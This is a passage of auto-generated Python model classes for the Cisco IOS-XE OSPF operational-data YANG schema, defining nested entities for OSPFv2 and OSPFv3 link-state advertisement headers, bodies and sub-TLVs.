"link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class UnknownSubTlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", 